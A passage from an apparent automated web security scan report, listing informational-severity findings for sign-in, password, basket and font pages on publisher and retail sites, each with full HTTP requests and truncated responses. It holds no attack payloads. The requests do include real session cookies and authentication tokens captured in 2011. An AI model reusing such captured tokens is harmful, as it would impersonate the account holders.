Cookie: RES_SESSIONID=212207240983843; JSESSIONID=38D14861B5F177BDEE31B25C6E8D7C7F.ecommerce_wrk1; s_cc=true; ResonanceSegment=1; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]; s_sq=%5B%5BB%5D%5D; RES_TRACKINGID=686529694590717; CP=null*; rhcartitems=; SC_LINKS=%5B%5BB%5D%5D; __qca=P0-874375948-1303855562358; mbox=session#1303855598284-166145#1303858166|PC#1303855598284-166145#1366928306|check#true#1303856366;

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 22:19:46 GMT
Server: Apache
Content-Type: text/html;charset=ISO-8859-1
Connection: close
Content-Length: 20193


<!--createAccount.vm -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.
...[SNIP]...

27.11. https://ecommerce.randomhouse.com/password.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ecommerce.randomhouse.com
Path:   /password.do

Request

GET /password.do HTTP/1.1
Host: ecommerce.randomhouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=212207240983843; JSESSIONID=38D14861B5F177BDEE31B25C6E8D7C7F.ecommerce_wrk1; s_cc=true; ResonanceSegment=1; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]; s_sq=%5B%5BB%5D%5D; RES_TRACKINGID=686529694590717; CP=null*; rhcartitems=; SC_LINKS=%5B%5BB%5D%5D; __qca=P0-874375948-1303855562358; mbox=session#1303855598284-166145#1303858166|PC#1303855598284-166145#1366928306|check#true#1303856366;

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 22:19:32 GMT
Server: Apache
Content-Type: text/html;charset=ISO-8859-1
Connection: close
Content-Length: 11309


<!-- forgottenPassword.vm -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="htt
...[SNIP]...

27.12. https://ecommerce.randomhouse.com/sign-in-submit.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ecommerce.randomhouse.com
Path:   /sign-in-submit.do

Request

GET /sign-in-submit.do HTTP/1.1
Host: ecommerce.randomhouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=212207240983843; JSESSIONID=38D14861B5F177BDEE31B25C6E8D7C7F.ecommerce_wrk1; s_cc=true; ResonanceSegment=1; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]; s_sq=%5B%5BB%5D%5D; RES_TRACKINGID=686529694590717; CP=null*; rhcartitems=; SC_LINKS=%5B%5BB%5D%5D; __qca=P0-874375948-1303855562358; mbox=session#1303855598284-166145#1303858166|PC#1303855598284-166145#1366928306|check#true#1303856366;

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 22:26:47 GMT
Server: Apache
Content-Type: text/html;charset=ISO-8859-1
Connection: close
Content-Length: 16981


<!-- signIn.vm -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/
...[SNIP]...

27.13. https://ecommerce.randomhouse.com/sign-in.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ecommerce.randomhouse.com
Path:   /sign-in.do

Request

GET /sign-in.do?from=randomhouse HTTP/1.1
Host: ecommerce.randomhouse.com
Connection: keep-alive
Referer: https://ecommerce.randomhouse.com/account.do?from=randomhouse
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RES_TRACKINGID=686529694590717; __qca=P0-874375948-1303855562358; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]; JSESSIONID=388CC68FD235E0B3FC2D6F4CD6E761C9.ecommerce_wrk1; SC_LINKS=%5B%5BB%5D%5D; CP=null*; mbox=check#true#1303855669|session#1303855598284-166145#1303857469|PC#1303855598284-166145#1366927609; s_cc=true; RES_SESSIONID=212207240983843; ResonanceSegment=1; s_sq=ranhcorporate%2Cranhrollup%3D%2526pid%253Dsignin%2526pidt%253D1%2526oid%253Dhttps%25253A//ecommerce.randomhouse.com/sign-in.do%25253Ffrom%25253Drandomhouse%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 22:06:44 GMT
Server: Apache
Content-Type: text/html;charset=ISO-8859-1
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Length: 16851


<!-- signIn.vm -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/
...[SNIP]...

27.14. https://my.omniture.com/login/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://my.omniture.com
Path:   /login/

Request

GET /login/ HTTP/1.1
Host: my.omniture.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: elqCustomerGUID=8ee1d10d-cce1-42b6-8bb1-95eb59d8f5ba; campaign_stack=%5B%5B%22seo_other_referer%22%2C%221303601755097%22%5D%5D; _jsuid=9992808058213638945; search_stack=%5B%5B%22seo_other_referer%22%2C%221303601967106%22%5D%5D; s_cid=seo_other_referer; sc_locale_numbers=en_US; sc_locale=en_US; FLASH_ENABLED=yes; cms_site_lang=1; s_iid=1327; omniture_unique=112017266a99890bba572ea82148c69e; s_cc=true; s_sq=omniturecom%2Comnitureall%2Comniturecomdev%2Comniturecomemea%2Comnitureapac%2Comniturenoncustomer%2Comniturecomen%3D%2526pid%253DTest%252526Target%2526pidt%253D1%2526oid%253Dhttp%25253A//www.omniture.com/offer/943%25253Fs_osc%25253D30199%2526ot%253DA; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; mbox=PC#1303601743323-887111.17#1306271419|check#true#1303852279|session#1303852218540-851916#1303854079

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 21:18:23 GMT
Server: Omniture AWS/2.0.0
xserver: www455
Keep-Alive: timeout=15
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 47239

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Adobe
...[SNIP]...

27.15. https://myaccount.west.thomson.com/MYACCOUNT/css/font/knowledgelight-webfont-2010.ttf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://myaccount.west.thomson.com
Path:   /MYACCOUNT/css/font/knowledgelight-webfont-2010.ttf

Request

GET /MYACCOUNT/css/font/knowledgelight-webfont-2010.ttf HTTP/1.1
Host: myaccount.west.thomson.com
Connection: keep-alive
Referer: https://myaccount.west.thomson.com/MyAccount/AccessControl/AccessControl/SignIn?ReturnUrl=http%3a%2f%2fmyaccount.west.thomson.com%2fMYACCOUNT%2fdefault.aspx%3fReturnUrl%3d%2fMyAccount%2fCommon%2fLanding%2fMyAccountLanding%3fpromcode%3d571424%26sauth%3dwest_thomson_com%26xauth%3dseamless%26promcode%3d571424%26sauth%3dwest_thomson_com%26xauth%3dseamless&transferToken=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LastKnownSiteId=1; c=undefined571419undefined; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848211712%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848222394%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848274123%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848274825%27%5D%5D; c_m2=1; SC_LINKS=%5B%5BB%5D%5D; gpv_pn=Shipping%20Information; MA_ASP.NET_SessionId=3vutg44502ahok55j2zo3o45; s_ppv=100; s_cc=true; s_sq=

Response

HTTP/1.1 200 OK
Content-Length: 46788
Content-Type: application/octet-stream
Content-Location: http://myaccount.west.thomson.com/MYACCOUNT/css/font/knowledgelight-webfont-2010.ttf
Last-Modified: Fri, 15 Apr 2011 15:05:22 GMT
Accept-Ranges: bytes
ETag: "0259a8a7efbcb1:119f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 20:06:03 GMT

............FFTMY$@5........GDEF.......(... OS/2.a.?...H...`cmap..k.........cvt .......t...0fpgm../........egasp............glyfO...........head..[........6hhea.3.....$...$hmtx..X....H....loca);R.....
...[SNIP]...

27.16. https://secure.bundle.com/XmlContent/Carouselpage.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.bundle.com
Path:   /XmlContent/Carouselpage.xml

Request

GET /XmlContent/Carouselpage.xml HTTP/1.1
Host: secure.bundle.com
Connection: keep-alive
Referer: https://secure.bundle.com/msn
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=1.1303843206.1.1.utmcsr=money.msn.com|utmccn=(referral)|utmcmd=referral|utmcct=/taxes/; __utma=1.2122043951.1303843206.1303843206.1303843206.1; __utmc=1; __utmb=1.2.10.1303843206; SESSIONID=h50b1r45qzwyxs34b22hzjzc

Response

HTTP/1.1 200 OK
Content-Type: application/xml
Last-Modified: Tue, 26 Apr 2011 18:39:31 GMT
ETag: "a3b14c3eaa47e162ce5141d4a37ce8e6"
Server: Microsoft-IIS/7.0
Force-Cache: 1
X-Bundle-Server: prod-web01-live
X-Bundle-Server: prod-web05
Content-Length: 19158
Date: Tue, 26 Apr 2011 18:41:45 GMT
Connection: keep-alive
Cache-Control: private
Expires: Tue, 26 Apr 2011 18:49:31 GMT
Expires: Tue, 26 Apr 2011 18:49:31 GMT


<CarouselPage xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
   <CarouselItems>
   
       <Item>
           <DiscoveryUrl>/article/i-dont-want-hang-out-my-cheap
...[SNIP]...

27.17. https://west.thomson.com/noexpire/font/knowledgebold-webfont-2010.woff  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://west.thomson.com
Path:   /noexpire/font/knowledgebold-webfont-2010.woff

Request

GET /noexpire/font/knowledgebold-webfont-2010.woff HTTP/1.1
Host: west.thomson.com
Connection: keep-alive
Referer: https://west.thomson.com/store/Promotions/EmailPreferences/Login.aspx?Mstr=wtc&PromCode=571419&FindingMethod=Navigation
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=bijb1vookoje2tnvwh5oouwn; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; Guest_Status=True; Guest_User=-1; LastKnownSiteId=1; SbasketVw=T; UserSiteIdIdentifier=; .WTCAUTH=D645C478A4226280B49ADCFB61BAED10A26C9D485AE7330FE6C2B4009102B52EAE52172FA93AE5C8928AB8152791FC8B6D7AA367896CF4E988C1C2943CC82EC673F171127468F7BE4E42FE45AD24FA805AD6E7DDDB98506B24608BB0CD029E9FA40BFED7C8850C83E7770503138347EB4A85195337459C7452C4148A8831D95BD7A25EA645AB0DC8FD795ED0843602E0A53B1EBBB50B7869294EB4C4F94C569955C1B219142D70778D962072E4C700E489CF9193FA0332310D1D8CB14EE251FE9535262EC5993F6ED217FBBC84513DB0F3FB9CE39021DE8344BDEC8A158E6FBA94B8CD49; s_cc=true; c_m2=1; c=undefined571419undefined; SC_LINKS=%5B%5BB%5D%5D; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848211712%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848222394%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848274123%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848274825%27%5D%5D; gpv_pn=store%3Apromotions%3Aemailpreferences%3Alogin; s_ppv=0; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: max-age=31536000
Content-Length: 24208
Content-Type: application/octet-stream
Last-Modified: Thu, 21 Apr 2011 11:37:04 GMT
Accept-Ranges: bytes
ETag: ""
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 20:04:27 GMT

wOFF......^........L........................FFTM...l........Y$@;GDEF........... ....OS/2.......X...`....cmap.......}......k.cvt .......<...<.    .Hfpgm...........e../.gasp...p............glyf...|..Q....X
...[SNIP]...

27.18. https://west.thomson.com/noexpire/font/knowledgelight-webfont-2010.woff  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://west.thomson.com
Path:   /noexpire/font/knowledgelight-webfont-2010.woff

Request

GET /noexpire/font/knowledgelight-webfont-2010.woff HTTP/1.1
Host: west.thomson.com
Connection: keep-alive
Referer: https://west.thomson.com/store/Promotions/EmailPreferences/Login.aspx?Mstr=wtc&PromCode=571419&FindingMethod=Navigation
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=bijb1vookoje2tnvwh5oouwn; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; Guest_Status=True; Guest_User=-1; LastKnownSiteId=1; SbasketVw=T; UserSiteIdIdentifier=; .WTCAUTH=D645C478A4226280B49ADCFB61BAED10A26C9D485AE7330FE6C2B4009102B52EAE52172FA93AE5C8928AB8152791FC8B6D7AA367896CF4E988C1C2943CC82EC673F171127468F7BE4E42FE45AD24FA805AD6E7DDDB98506B24608BB0CD029E9FA40BFED7C8850C83E7770503138347EB4A85195337459C7452C4148A8831D95BD7A25EA645AB0DC8FD795ED0843602E0A53B1EBBB50B7869294EB4C4F94C569955C1B219142D70778D962072E4C700E489CF9193FA0332310D1D8CB14EE251FE9535262EC5993F6ED217FBBC84513DB0F3FB9CE39021DE8344BDEC8A158E6FBA94B8CD49; s_cc=true; c_m2=1; c=undefined571419undefined; SC_LINKS=%5B%5BB%5D%5D; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848211712%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848222394%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848274123%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848274825%27%5D%5D; gpv_pn=store%3Apromotions%3Aemailpreferences%3Alogin; s_ppv=0; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: max-age=31536000
Content-Length: 24968
Content-Type: application/octet-stream
Last-Modified: Thu, 21 Apr 2011 11:37:04 GMT
Accept-Ranges: bytes
ETag: ""
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 20:04:28 GMT

wOFF......a.................................FFTM...l........Y$@5GDEF........... ....OS/2.......V...`.a.?cmap.......}......k.cvt .......0...0....fpgm...........e../.gasp...d............glyf...p..S.....
...[SNIP]...

27.19. https://west.thomson.com/store/Promotions/EmailPreferences/Login.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://west.thomson.com
Path:   /store/Promotions/EmailPreferences/Login.aspx

Request

GET /store/Promotions/EmailPreferences/Login.aspx?Mstr=wtc&PromCode=571419&FindingMethod=Navigation HTTP/1.1
Host: west.thomson.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=bijb1vookoje2tnvwh5oouwn; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; s_cc=true; c_m2=1; c=undefinedDirect%20LoadDirect%20Load; SC_LINKS=%5B%5BB%5D%5D; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%5D; gpv_pn=default; s_sq=%5B%5BB%5D%5D; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; s_ppv=75; .WTCAUTH=06CA2923AD720AED00911CF592288E796D54EF811208119980F8FB37CA43273D9DFEC8C40F3C0D72C7F3F5BB3FA9C8F3C5E74EE348ECCA6B35E4E107909B01AE597FE9603A89811073C77C2D1CEF0DFCF4C3954A224BA70CB09C1F7BB4132B10277D7057D02CD5A348E567450BC9313BF64CF52EE76F06E0A742647B41E23ED82ABCD1F3EF162F1597FC356A16F46C4C3ECC94AE454D8BD3AE08271BA0F4BF28ED7AAD920CC0D4EB5DA1F49BB1CE5F414460A82807C25F612865975ED0388641DF48A052AE97A698D5F7B6FCE96AA4A5F527AD930E272A65F131FEF9F615E6BC8D4D124F; Guest_Status=True; Guest_User=-1; LastKnownSiteId=1; UserSiteIdIdentifier=

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:04:15 GMT
Server: Microsoft-IIS/6.0
Etag: ""
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Set-Cookie: UserSiteIdIdentifier=; path=/
Set-Cookie: .WTCAUTH=A85C2F3C93F050051A95CC95A3B0888C03B9DBEF0A026D745D0656E2E3DE853394140B6D80EEE33684BAC22241C10BCEC46D800215998CBC7CB21197B52E754E19FAA6C1F1725A6249D03181F66A430ECE47F662E7EF119243B001BEA25F850311DCB9495BBDE849BAEAE38CFAF69EE6C71B979EC9A46B08E8C5B362E255E6FCD960E943F41886886E045C4EB97A5121632E495A2DE980E64EC33F053829F75AEDFBDE371B36DC072FBB362065481E66F8EFF61623D579526A71AC8DD9F30FF1BFAD99A5FA5D2AE551F509B6E57AC0127A7E82DD4063747DCDE458BCBBFA35D0CE53B82A; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 69722


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...

27.20. https://west.thomson.com/store/secure/EmptyBasket.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://west.thomson.com
Path:   /store/secure/EmptyBasket.aspx

Request

GET /store/secure/EmptyBasket.aspx HTTP/1.1
Host: west.thomson.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=bijb1vookoje2tnvwh5oouwn; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; Guest_Status=True; Guest_User=-1; LastKnownSiteId=1; s_cc=true; c_m2=1; c=undefined645229L86530undefined; SC_LINKS=%5B%5BB%5D%5D; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848211712%27%5D%5D; gpv_pn=Bankruptcy%20Exemption%20Manual%2C%202010%20ed.%20%28West%27s%26%23174%3B%20Bankruptcy%20Series%29; s_ppv=0; s_sq=%5B%5BB%5D%5D; UserSiteIdIdentifier=; .WTCAUTH=0D1C43F14C3D0360D4C56BDD0D49E3A1E347C13F76ADC1B282235271457FAC648FB37FE6B223762A24E6CB268609BC8463ECB71442613CE6C286443DD8C796AD188F8568D73785118A509021BEABBD4E55D10E5F1E3A4F4A3F1B558AB2332C44A56F489B0571AEA92276AE792D9D8761A0FBB7322D072015D4B719941EFD8FCB5CDB63E1CEF01EF859C876D1DA920B7EB3539BA4B4D934B5A3CF2F56BB805BA3F3435E9F173B50A3D9F7C34D0C8E7180A2F74BC8118F96769794F6D4C7A36DCE92EEA8FE38E72E95AF86A85ADB9338C9E73EDA3652910D79D1A7D57B6EF7422F00DB82A9

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:06:52 GMT
Server: Microsoft-IIS/6.0
Etag: ""
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Set-Cookie: UserSiteIdIdentifier=; path=/
Set-Cookie: .WTCAUTH=79CBDB991A6459338884A46B49D0105C145D63087A0F6EA1AF1008AF8F10A6BE20B4B11D124F705A3B3E14AC22EC73DD213F5F9EEB5214BC1762EE7929A0F454C61A0BDCF1DEC78E1A8885681779E756F6C33BB53E5D00DC20A327C71B7A18A01CD2DEC0CB430995B2D528EAE5EDE656A06490C12141D8DC1BDB52EA377E9C528F52835D9BB8C6526E44BC00F17481EEE8BAF4CEFD033D588FC1950953DF71D7BEC464ACA7CC296D962C2F89E8B7BF9E2164F2A2485B2AD03B442B72330D47CEE8F0DEFDB9FFFF7F71AE584B4FEA6F98140E539AF54249B185FB8811D025A5E2F4D81C75; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 68662


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><meta c
...[SNIP]...

27.21. https://west.thomson.com/store/secure/ShippingInfo.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://west.thomson.com
Path:   /store/secure/ShippingInfo.aspx

Request

GET /store/secure/ShippingInfo.aspx?CartEventsAndParams=scAdd%3a+22061301%3b&CartContents=22061301%3b&PromCode=600582C43552&PromType=internal&Ctl00%24placeHolderTopNavigation%24WeststoreHeader%24cmbBucketCategory=adv_bkt_Books&Ctl00%24placeHolderTopNavigation%24WeststoreHeader%24txtSearch=keyword%2c+title%2c+author+or+ISBN&Ctl00%24placeHolderTopNavigation%24placeHolderContent%24basketItems%24ctl00%24txtQuantity=1&ChkCCMe=CC+Me&PageTitle=cart HTTP/1.1
Host: west.thomson.com
Connection: keep-alive
Referer: http://west.thomson.com/store/secure/ShoppingBasket.aspx?CartEventsAndParams=scAdd%3a+22061301%3b&CartContents=22061301%3b&PromCode=600582C43552&PromType=internal
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=bijb1vookoje2tnvwh5oouwn; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; Guest_Status=True; Guest_User=-1; LastKnownSiteId=1; SbasketVw=T; s_cc=true; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848211712%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848222394%27%5D%5D; s_ppv=66; c_m2=1; c=undefined645229L86530undefined; SC_LINKS=%5B%5BB%5D%5D; gpv_pn=Bankruptcy%20Exemption%20Manual%2C%202010%20ed.%20%28West%27s%26%23174%3B%20Bankruptcy%20Series%29; s_sq=thwest%3D%2526pid%253DBankruptcy%252520Exemption%252520Manual%25252C%2525202010%252520ed.%252520%252528West%252527s%252526%252523174%25253B%252520Bankruptcy%252520Series%252529%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BshowPopupBubble%252528%252527ctl00%252524placeHolderTopNavigation%252524placeHolderContent%252524ctl00%252524popu%2526oidt%253D2%2526ot%253DIMAGE; UserSiteIdIdentifier=; .WTCAUTH=9DFF38C2ED245A836B638A4FD2BB05048EFDFD2A3F3BC8DC4D0876357DAC06B163234E108A8F0DA6FFB919F8831205FF1893BF274F77770E9447A6CF6832F99911CAEA4F06343A555BDF7037EBDAD0392A3B821D6A252C115D9D10A1FD2B10DE395F8581D4BBE49B8B4EF6A088A00BE982BA5CBAAC1C23CD6D40E8E10C4A8CB90101D3CE531D7618D4A99EC6ED09D86A6A87BEB92C84EBB5541C5F4267CA16C317ED73CD9AD52E9BCFFCFA39E7A4F7561999EF701967F4FAEE3513AC9E115F783D6CA97286E2B3D06563DA39F267FA170B8C51C76EEB06DDD6F99A112D49B9ED48435EDE

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:04:45 GMT
Server: Microsoft-IIS/6.0
Etag: ""
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Set-Cookie: UserSiteIdIdentifier=; path=/
Set-Cookie: .WTCAUTH=C92933A45E8BBE47C7EEF54F80B6D25789CF3B0DE11279B4960956BC8BB0E345579BADF326956E9721B67D71932107D3B64238D6EE6707D06C81817121C5953C161DDD49619F87B8AE2E421C792976F48CA556F7DB0C834EB3BE231FCF4A767E58A07AA7485840E793C3A65F7DEB1BA7BD4CA2E971C144356D50FC6DD68AFCB7569D943E22EBDA2359D2DDAFEEB65197678B43B591B46F28E9EA05EC9F8FE84A521E37C1F57160F4EE7D67E36501BABC3987B29619274E9EBC26949903E1FDAEC56DB8129C91303E8A4BE5A28D8839FB0A532C6B8B24419839BF14AB2C51AD3259D6DF7F; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 134558


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><meta c
...[SNIP]...

27.22. https://west.thomson.com/support/customer-service/order-info.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://west.thomson.com
Path:   /support/customer-service/order-info.aspx

Request

GET /support/customer-service/order-info.aspx HTTP/1.1
Host: west.thomson.com
Connection: keep-alive
Referer: https://west.thomson.com/store/Promotions/EmailPreferences/Login.aspx?Mstr=wtc&PromCode=571419&FindingMethod=Navigation
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
